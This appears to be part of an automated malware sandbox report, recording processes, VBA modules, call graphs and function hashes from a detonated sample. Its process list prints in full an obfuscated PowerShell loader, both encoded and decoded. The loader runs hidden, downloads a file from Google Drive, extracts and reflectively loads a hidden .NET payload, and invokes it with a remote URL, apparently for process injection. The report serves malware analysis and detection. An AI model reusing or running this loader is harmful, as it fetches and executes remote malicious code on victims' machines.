                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:24
                                                                                              Start time:02:40:03
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS"
                                                                                              Imagebase:0xff600000
                                                                                              File size:168'960 bytes
                                                                                              MD5 hash:045451FA238A75305CC26AC982472367
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:25
                                                                                              Start time:02:40:03
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                              Imagebase:0x13fcb0000
                                                                                              File size:443'392 bytes
                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:27
                                                                                              Start time:02:40:04
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
                                                                                              Imagebase:0x13fcb0000
                                                                                              File size:443'392 bytes
                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Disassembly

                                                                                              Code Analysis

                                                                                              Call Graph

                                                                                              • Entrypoint
                                                                                              • Decryption Function
                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              • Show Help
                                                                                              callgraph 1 Error: Graph is empty

                                                                                              Module: Sheet1

                                                                                              Declaration
                                                                                              LineContent
                                                                                              1

                                                                                              Attribute VB_Name = "Sheet1"

                                                                                              2

                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                              3

                                                                                              Attribute VB_GlobalNameSpace = False

                                                                                              4

                                                                                              Attribute VB_Creatable = False

                                                                                              5

                                                                                              Attribute VB_PredeclaredId = True

                                                                                              6

                                                                                              Attribute VB_Exposed = True

                                                                                              7

                                                                                              Attribute VB_TemplateDerived = False

                                                                                              8

                                                                                              Attribute VB_Customizable = True

                                                                                              Module: Sheet2

                                                                                              Declaration
                                                                                              LineContent
                                                                                              1

                                                                                              Attribute VB_Name = "Sheet2"

                                                                                              2

                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                              3

                                                                                              Attribute VB_GlobalNameSpace = False

                                                                                              4

                                                                                              Attribute VB_Creatable = False

                                                                                              5

                                                                                              Attribute VB_PredeclaredId = True

                                                                                              6

                                                                                              Attribute VB_Exposed = True

                                                                                              7

                                                                                              Attribute VB_TemplateDerived = False

                                                                                              8

                                                                                              Attribute VB_Customizable = True

                                                                                              Module: Sheet3

                                                                                              Declaration
                                                                                              LineContent
                                                                                              1

                                                                                              Attribute VB_Name = "Sheet3"

                                                                                              2

                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                              3

                                                                                              Attribute VB_GlobalNameSpace = False

                                                                                              4

                                                                                              Attribute VB_Creatable = False

                                                                                              5

                                                                                              Attribute VB_PredeclaredId = True

                                                                                              6

                                                                                              Attribute VB_Exposed = True

                                                                                              7

                                                                                              Attribute VB_TemplateDerived = False

                                                                                              8

                                                                                              Attribute VB_Customizable = True

                                                                                              Module: ThisWorkbook

                                                                                              Declaration
                                                                                              LineContent
                                                                                              1

                                                                                              Attribute VB_Name = "ThisWorkbook"

                                                                                              2

                                                                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                              3

                                                                                              Attribute VB_GlobalNameSpace = False

                                                                                              4

                                                                                              Attribute VB_Creatable = False

                                                                                              5

                                                                                              Attribute VB_PredeclaredId = True

                                                                                              6

                                                                                              Attribute VB_Exposed = True

                                                                                              7

                                                                                              Attribute VB_TemplateDerived = False

                                                                                              8

                                                                                              Attribute VB_Customizable = True

                                                                                              Reset < >

                                                                                                Executed Functions

                                                                                                Function 02DC0FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000003.426133415.0000000002DC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_3_2dc0000_mshta.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                • Instruction ID: 44b456da7c15ac8eeb664d97a1433c767d2b86eca9e0dba855d3f302031d4c2a
                                                                                                • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Function 02DC0FB9 Relevance: .0, Instructions: 5COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000003.426133415.0000000002DC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_3_2dc0000_mshta.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                • Instruction ID: 44b456da7c15ac8eeb664d97a1433c767d2b86eca9e0dba855d3f302031d4c2a
                                                                                                • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Function 02DC0FB1 Relevance: .0, Instructions: 5COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000003.426133415.0000000002DC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_3_2dc0000_mshta.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                • Instruction ID: 44b456da7c15ac8eeb664d97a1433c767d2b86eca9e0dba855d3f302031d4c2a
                                                                                                • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                • Instruction Fuzzy Hash:

                                                                                                Execution Graph

                                                                                                Execution Coverage:5%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:50%
                                                                                                Total number of Nodes:6
                                                                                                Total number of Limit Nodes:0
                                                                                                execution_graph 2497 7fe88e559e1 2498 7fe88e559f1 URLDownloadToFileW 2497->2498 2500 7fe88e55b00 2498->2500 2501 7fe88e54b18 2502 7fe88e55a30 URLDownloadToFileW 2501->2502 2504 7fe88e55b00 2502->2504

                                                                                                Executed Functions

                                                                                                Function 000007FE88E54B18 Relevance: 1.6, APIs: 1, Instructions: 129filenetworkCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 101 7fe88e54b18-7fe88e55aa1 105 7fe88e55aa3-7fe88e55aa8 101->105 106 7fe88e55aab-7fe88e55ab1 101->106 105->106 107 7fe88e55ab3-7fe88e55ab8 106->107 108 7fe88e55abb-7fe88e55afe URLDownloadToFileW 106->108 107->108 109 7fe88e55b00 108->109 110 7fe88e55b06-7fe88e55b23 108->110 109->110
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.475966843.000007FE88E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88E50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7fe88e50000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: DownloadFile
                                                                                                • String ID:
                                                                                                • API String ID: 1407266417-0
                                                                                                • Opcode ID: fd4c8ce43aa837d011d7644b9ef6885a26e0f585a8451fc791eab1d2ecc86802
                                                                                                • Instruction ID: 6625624392cc402f20af31f75445c57b70ad52a67572983d578ccf4a7280b7f3
                                                                                                • Opcode Fuzzy Hash: fd4c8ce43aa837d011d7644b9ef6885a26e0f585a8451fc791eab1d2ecc86802
                                                                                                • Instruction Fuzzy Hash: DB319F31918E1C8FDB58DF9CD8857A9B7E0FB69321F00822ED04ED3652CB70A9068B81
                                                                                                Function 000007FE88F22708 Relevance: 3.2, Strings: 2, Instructions: 703COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 7fe88f22708-7fe88f22729 1 7fe88f22772-7fe88f22799 0->1 2 7fe88f2272b-7fe88f22770 0->2 3 7fe88f2279f-7fe88f227a9 1->3 4 7fe88f22c7d-7fe88f22d36 1->4 2->1 5 7fe88f227c2-7fe88f227c9 3->5 6 7fe88f227ab-7fe88f227b8 3->6 9 7fe88f227e0 5->9 10 7fe88f227cb-7fe88f227de 5->10 6->5 8 7fe88f227ba-7fe88f227c0 6->8 8->5 11 7fe88f227e2-7fe88f227e4 9->11 10->11 14 7fe88f22bf8-7fe88f22c02 11->14 15 7fe88f227ea-7fe88f227f6 11->15 16 7fe88f22c15-7fe88f22c25 14->16 17 7fe88f22c04-7fe88f22c14 14->17 15->4 18 7fe88f227fc-7fe88f22806 15->18 20 7fe88f22c32-7fe88f22c7c 16->20 21 7fe88f22c27-7fe88f22c2b 16->21 22 7fe88f22822-7fe88f22832 18->22 23 7fe88f22808-7fe88f22815 18->23 21->20 22->14 29 7fe88f22838-7fe88f2286c 22->29 23->22 24 7fe88f22817-7fe88f22820 23->24 24->22 29->14 34 7fe88f22872-7fe88f2287e 29->34 34->4 35 7fe88f22884-7fe88f2288e 34->35 36 7fe88f22890-7fe88f2289d 35->36 37 7fe88f228a7-7fe88f228ac 35->37 36->37 39 7fe88f2289f-7fe88f228a5 36->39 37->14 38 7fe88f228b2-7fe88f228b7 37->38 38->14 40 7fe88f228bd-7fe88f228c2 38->40 39->37 40->14 42 7fe88f228c8-7fe88f228d7 40->42 43 7fe88f228d9-7fe88f228e3 42->43 44 7fe88f228e7 42->44 45 7fe88f228e5 43->45 46 7fe88f22903-7fe88f2298e 43->46 47 7fe88f228ec-7fe88f228f9 44->47 45->47 54 7fe88f22990-7fe88f2299b 46->54 55 7fe88f229a2-7fe88f229c4 46->55 47->46 48 7fe88f228fb-7fe88f22901 47->48 48->46 54->55 56 7fe88f229d4 55->56 57 7fe88f229c6-7fe88f229d0 55->57 60 7fe88f229d9-7fe88f229e6 56->60 58 7fe88f229f0-7fe88f22a7e 57->58 59 7fe88f229d2 57->59 67 7fe88f22a80-7fe88f22a8b 58->67 68 7fe88f22a92-7fe88f22ab0 58->68 59->60 60->58 62 7fe88f229e8-7fe88f229ee 60->62 62->58 67->68 69 7fe88f22ac0 68->69 70 7fe88f22ab2-7fe88f22abc 68->70 73 7fe88f22ac5-7fe88f22ad3 69->73 71 7fe88f22abe 70->71 72 7fe88f22add-7fe88f22b6d 70->72 71->73 80 7fe88f22b81-7fe88f22bda 72->80 81 7fe88f22b6f-7fe88f22b7a 72->81 73->72 74 7fe88f22ad5-7fe88f22adb 73->74 74->72 84 7fe88f22be2-7fe88f22bf7 80->84 81->80
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.476196271.000007FE88F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88F20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7fe88f20000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0cY$8=Y
                                                                                                • API String ID: 0-11084473
                                                                                                • Opcode ID: f8d4f22a27988e2817cafd1ebe2f4df5963d45cede0c0fa58ea37a8d03c8d5eb
                                                                                                • Instruction ID: 92c41eec0a941053b937fceef900ed8acfcfc336592117556f47c0c14083218c
                                                                                                • Opcode Fuzzy Hash: f8d4f22a27988e2817cafd1ebe2f4df5963d45cede0c0fa58ea37a8d03c8d5eb
                                                                                                • Instruction Fuzzy Hash: 9C221230A0CB894FD75AEB2C9450675BBE2FF9A344F2801AAD49EC72A3DB349D15C741
                                                                                                Function 000007FE88E559E1 Relevance: 1.7, APIs: 1, Instructions: 159filenetworkCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.475966843.000007FE88E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88E50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7fe88e50000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: DownloadFile
                                                                                                • String ID:
                                                                                                • API String ID: 1407266417-0
                                                                                                • Opcode ID: f73932adf486f1b77e6734a471af790095287316b0bf7f673ddd52bb06a1885e
                                                                                                • Instruction ID: 4f410cb2eee1d22c562956ef4011a090ac6b71edf71bb21886caed707a910b55
                                                                                                • Opcode Fuzzy Hash: f73932adf486f1b77e6734a471af790095287316b0bf7f673ddd52bb06a1885e
                                                                                                • Instruction Fuzzy Hash: 2E41E47080CB8C9FDB1ADB989C447A9BBF0FB56321F04826FD089D3162CB74A806C781
                                                                                                Function 000007FE88F20F0D Relevance: 1.6, Strings: 1, Instructions: 364COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 111 7fe88f20f0d-7fe88f20f41 113 7fe88f20f43-7fe88f20f61 111->113 114 7fe88f20f89-7fe88f20f96 111->114 115 7fe88f20f63-7fe88f20f88 113->115 116 7fe88f20faa-7fe88f20fac 113->116 117 7fe88f21098-7fe88f210dc 114->117 118 7fe88f20f9c-7fe88f20fa6 114->118 115->114 119 7fe88f20fad 116->119 127 7fe88f210de-7fe88f210eb 117->127 128 7fe88f210ed-7fe88f21124 117->128 120 7fe88f20fbf-7fe88f20fee 118->120 121 7fe88f20fa8-7fe88f20fa9 118->121 119->119 122 7fe88f20fae-7fe88f20fb5 119->122 120->117 133 7fe88f20ff4-7fe88f20ffe 120->133 121->116 122->120 124 7fe88f20fb7-7fe88f20fbd 122->124 124->120 127->128 131 7fe88f211c1-7fe88f211cb 128->131 132 7fe88f2112a-7fe88f2119e 128->132 134 7fe88f211d8-7fe88f211e8 131->134 135 7fe88f211cd-7fe88f211d7 131->135 151 7fe88f211a6-7fe88f211be 132->151 136 7fe88f21000-7fe88f2100d 133->136 137 7fe88f21017-7fe88f21077 133->137 138 7fe88f211f5-7fe88f2121a 134->138 139 7fe88f211ea-7fe88f211ee 134->139 136->137 141 7fe88f2100f-7fe88f21015 136->141 148 7fe88f21079-7fe88f21084 137->148 149 7fe88f2108b-7fe88f21097 137->149 139->138 141->137 148->149 151->131
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.476196271.000007FE88F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88F20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7fe88f20000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: xFQ
                                                                                                • API String ID: 0-2256667130
                                                                                                • Opcode ID: 498e0be57f5a4cd77d0ca0b1f9a6c7e4c74ad01299f9a48da6200241a29b3159
                                                                                                • Instruction ID: 8cca62251fc85be6f78f612a95b79bde9c97c7350cce5b89a7cd9107e9340da6
                                                                                                • Opcode Fuzzy Hash: 498e0be57f5a4cd77d0ca0b1f9a6c7e4c74ad01299f9a48da6200241a29b3159
                                                                                                • Instruction Fuzzy Hash: CCB1422060D7C90FE34B973858646617FE1EF57210B2901EBD88DCB2B3D6189D9AC321

                                                                                                Non-executed Functions

                                                                                                Function 000007FE88F204B8 Relevance: 16.0, Strings: 12, Instructions: 987COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 152 7fe88f204b8-7fe88f204e9 153 7fe88f20532-7fe88f20551 152->153 154 7fe88f204eb-7fe88f20508 152->154 157 7fe88f20793-7fe88f207ab 153->157 158 7fe88f20557-7fe88f20561 153->158 155 7fe88f20512-7fe88f20522 154->155 156 7fe88f2050a-7fe88f20511 154->156 159 7fe88f20524-7fe88f20531 155->159 160 7fe88f2056c-7fe88f20571 155->160 156->155 167 7fe88f207f5-7fe88f20847 157->167 168 7fe88f207ad-7fe88f207f3 157->168 161 7fe88f20563-7fe88f2056b 158->161 162 7fe88f2057b-7fe88f20580 158->162 159->153 160->162 164 7fe88f20573-7fe88f20579 160->164 161->160 165 7fe88f20722-7fe88f2072c 162->165 166 7fe88f20586-7fe88f20589 162->166 164->162 169 7fe88f2072e 165->169 170 7fe88f2073f-7fe88f2074f 165->170 171 7fe88f205a0 166->171 172 7fe88f2058b-7fe88f2059e 166->172 192 7fe88f20852-7fe88f20881 167->192 193 7fe88f20849-7fe88f20851 167->193 168->167 174 7fe88f2072f-7fe88f2073e 169->174 175 7fe88f20751-7fe88f20755 170->175 176 7fe88f2075c-7fe88f20792 170->176 177 7fe88f205a2-7fe88f205a4 171->177 172->177 175->176 177->165 180 7fe88f205aa-7fe88f205de 177->180 188 7fe88f205e0-7fe88f205f3 180->188 189 7fe88f205f5 180->189 191 7fe88f205f7-7fe88f205f9 188->191 189->191 191->165 194 7fe88f205ff-7fe88f20602 191->194 195 7fe88f20883-7fe88f2089c 192->195 196 7fe88f208a2-7fe88f208f2 192->196 193->192 194->165 197 7fe88f20608-7fe88f2060b 194->197 195->196 198 7fe88f208f4-7fe88f20921 196->198 199 7fe88f2093c-7fe88f20941 196->199 200 7fe88f20622 197->200 201 7fe88f2060d-7fe88f20620 197->201 202 7fe88f20b63-7fe88f20b7b 198->202 203 7fe88f20927-7fe88f20931 198->203 205 7fe88f20943-7fe88f20944 199->205 206 7fe88f2094b-7fe88f20950 199->206 204 7fe88f20624-7fe88f20626 200->204 201->204 221 7fe88f20bc5-7fe88f20c17 202->221 222 7fe88f20b7d-7fe88f20bc3 202->222 203->206 209 7fe88f20933-7fe88f2093b 203->209 204->165 210 7fe88f2062c-7fe88f2062f 204->210 224 7fe88f20946-7fe88f20949 205->224 225 7fe88f2097a-7fe88f209ae 205->225 207 7fe88f20af2-7fe88f20afc 206->207 208 7fe88f20956-7fe88f20959 206->208 214 7fe88f20b0f-7fe88f20b1f 207->214 215 7fe88f20afe 207->215 211 7fe88f20970 208->211 212 7fe88f2095b-7fe88f2096e 208->212 209->199 210->165 216 7fe88f20635-7fe88f2066f 210->216 220 7fe88f20972-7fe88f20974 211->220 212->220 218 7fe88f20b21-7fe88f20b25 214->218 219 7fe88f20b2c-7fe88f20b62 214->219 223 7fe88f20aff-7fe88f20b0e 215->223 232 7fe88f20671-7fe88f2067e 216->232 233 7fe88f20688-7fe88f20695 216->233 218->219 220->207 220->225 255 7fe88f20c22-7fe88f20c89 221->255 256 7fe88f20c19-7fe88f20c21 221->256 222->221 224->206 241 7fe88f209b0-7fe88f209c3 225->241 242 7fe88f209c5 225->242 232->233 238 7fe88f20680-7fe88f20686 232->238 239 7fe88f206a9-7fe88f206af 233->239 240 7fe88f20697-7fe88f206a2 233->240 238->233 244 7fe88f20720-7fe88f20721 239->244 245 7fe88f206b1-7fe88f206b3 239->245 240->239 246 7fe88f209c7-7fe88f209c9 241->246 242->246 245->174 248 7fe88f206b5 245->248 246->207 249 7fe88f209cf-7fe88f209d2 246->249 251 7fe88f206b7-7fe88f206ce 248->251 252 7fe88f206fc-7fe88f206fe 248->252 249->207 253 7fe88f209d8-7fe88f209db 249->253 254 7fe88f206ff-7fe88f20707 251->254 257 7fe88f206d0-7fe88f206f8 251->257 252->254 258 7fe88f209f2 253->258 259 7fe88f209dd-7fe88f209f0 253->259 261 7fe88f20709 254->261 262 7fe88f2070b-7fe88f20710 254->262 268 7fe88f20cd2-7fe88f20d00 255->268 269 7fe88f20c8b-7fe88f20cd1 255->269 256->255 257->252 260 7fe88f209f4-7fe88f209f6 258->260 259->260 260->207 263 7fe88f209fc-7fe88f209ff 260->263 264 7fe88f20711-7fe88f2071f 261->264 262->264 263->207 266 7fe88f20a05-7fe88f20a3f 263->266 264->244 274 7fe88f20a41-7fe88f20a4e 266->274 275 7fe88f20a58-7fe88f20a65 266->275 269->268 274->275 277 7fe88f20a50-7fe88f20a56 274->277 278 7fe88f20a79-7fe88f20a7f 275->278 279 7fe88f20a67-7fe88f20a72 275->279 277->275 280 7fe88f20a81-7fe88f20a83 278->280 281 7fe88f20af0-7fe88f20af1 278->281 279->278 280->223 282 7fe88f20a85 280->282 284 7fe88f20a87-7fe88f20a9e 282->284 285 7fe88f20acc-7fe88f20ace 282->285 286 7fe88f20aa0-7fe88f20ac8 284->286 287 7fe88f20acf-7fe88f20ad7 284->287 285->287 286->285 288 7fe88f20ad9 287->288 289 7fe88f20adb-7fe88f20ae0 287->289 290 7fe88f20ae1-7fe88f20aef 288->290 289->290 290->281
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.476196271.000007FE88F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88F20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7fe88f20000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (U$(U$(U$(U$(U$(U$0TY$0TY$0cY$0cY$8=Y$8=Y
                                                                                                • API String ID: 0-3995256861
                                                                                                • Opcode ID: 542daffa8f3984135b0854eba5e192b92f7e5c7b95754ac366b26d6b58e9d091
                                                                                                • Instruction ID: 210926f90acc3d2512240c6b41dd6aa8b481d5c1a047249e3550fa33360d56ea
                                                                                                • Opcode Fuzzy Hash: 542daffa8f3984135b0854eba5e192b92f7e5c7b95754ac366b26d6b58e9d091
                                                                                                • Instruction Fuzzy Hash: 3652033150D7CA0FE35AA72898212B57FE1EF97254F1900EBD49ECB1A3E7186916C352
                                                                                                Function 000007FE88F2314B Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 447 7fe88f2314b-7fe88f23169 448 7fe88f231b2-7fe88f231fb 447->448 449 7fe88f2316b-7fe88f231b1 447->449 449->448
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.476196271.000007FE88F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88F20000, based on PE: false
